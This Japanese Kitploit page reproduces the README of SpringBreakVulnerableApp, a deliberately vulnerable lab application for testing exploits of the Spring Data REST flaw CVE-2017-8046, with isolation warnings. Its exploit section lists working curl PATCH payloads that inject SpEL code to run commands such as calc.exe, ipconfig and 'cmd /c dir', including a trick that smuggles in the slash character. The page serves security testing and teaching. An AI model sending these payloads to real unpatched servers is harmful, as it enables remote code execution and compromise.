Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SpringBreakVulnerableApp — 警告:これはSpring Break脆弱性(CVE-2017-8046)のエクスプロイトをテストするための脆弱なアプリケーションです。自己責任で実行してください! | Kitploit
ツール/GitHubGitHub/m3ssap0/springbreakvulnerableapp
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubm3ssap0/springbreakvulnerableapp

SpringBreakVulnerableApp

警告:これはSpring Break脆弱性(CVE-2017-8046)のエクスプロイトをテストするための脆弱なアプリケーションです。自己責任で実行してください!

リポジトリを見る
14107年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Spring Break 脆弱性アプリケーション

これは、Spring Break 脆弱性(CVE-2017-8046)のエクスプロイトをテストするための脆弱性アプリケーションです。

警告!

このアプリケーションには深刻なセキュリティ脆弱性が含まれています。自己責任で実行してください!バックアップ済みで隔離された環境(最近のスナップショットとホストオンリーネットワークを備えた VM など)を使用することをお勧めします。このアプリケーションをインターネットに公開されたサーバーにアップロードしないでください。侵害されます。

免責事項: 私は、このアプリケーション(SpringBreakVulnerableApp)の使用方法について一切の責任を負いません。このアプリケーションの唯一の目的は、Spring Break エクスプロイトのテストシナリオとなることであり、悪意を持って使用すべきではありません。SpringBreakVulnerableApp のインストールを介してサーバーが侵害された場合、それは私の責任ではなく、アップロードしてインストールした人物の責任です。

脆弱性情報

  • CVE-ID: CVE-2017-8046
  • リンク: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
  • 説明: Pivotal Spring Data REST の 2.5.12、2.6.7、3.0 RC3 より前のバージョン、Spring Boot の 2.0.0M4 より前のバージョン、および Kay-RC3 より前の Spring Data リリーストレインの spring-data-rest サーバーに送信された悪意のある PATCH リクエストは、特別に細工された JSON データを使用して任意の Java コードを実行できます。

使用方法

アプリケーションは次の Maven コマンドで起動できます。

root@kitploit:~
mvn spring-boot:run

ファットJAR は次の Maven コマンドで生成できます。

root@kitploit:~
mvn clean install spring-boot:repackage

データを挿入するには、次の curl コマンドを使用できます。

root@kitploit:~
curl -i -X POST -H "Content-Type: application/json" -d '{ "name" : "Test", "attribute" : "foo"}' http://hostname:port/entity

エクスプロイト

おそらく最も簡単なエクスプロイトは、次のリクエストです。

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Thread).sleep(10000).x", "value" : "pwned" }]' "http://hostname:port/entity/1"

Windows では、次のリクエストで calc.exe プロセスを起動できます。同様のリクエストを使用して任意のコマンドを実行できます。

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Runtime).getRuntime().exec(\"calc.exe\").x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

起動したコマンドの出力を取得するには、Spring Framework のコードが提供するいくつかの「ガジェット」を使用できます。幸い、外部依存関係は必要ありません。たとえば、ipconfig コマンドの結果は、次のリクエストで取得できます。

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ipconfig\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Windows では、次のリクエストで cmd /c dir コマンドやその他の同様のコマンドを起動できます。スラッシュ文字を明示的な値を使わずに挿入するトリックに注意してください(つまり、実際の解析の前に明示的なスラッシュがドットに置き換えられます)。

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"cmd \" + T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F)) + \"c dir\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

この脆弱性を悪用する Java プログラムは ここ にあります。

作者

  • Antonio Francesco Sardella - 実装 - m3ssap0

ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE.txt ファイルを参照してください。

謝辞

  • Man Yue Mo 脆弱性を発見したセキュリティ研究者
ツールをダウンロード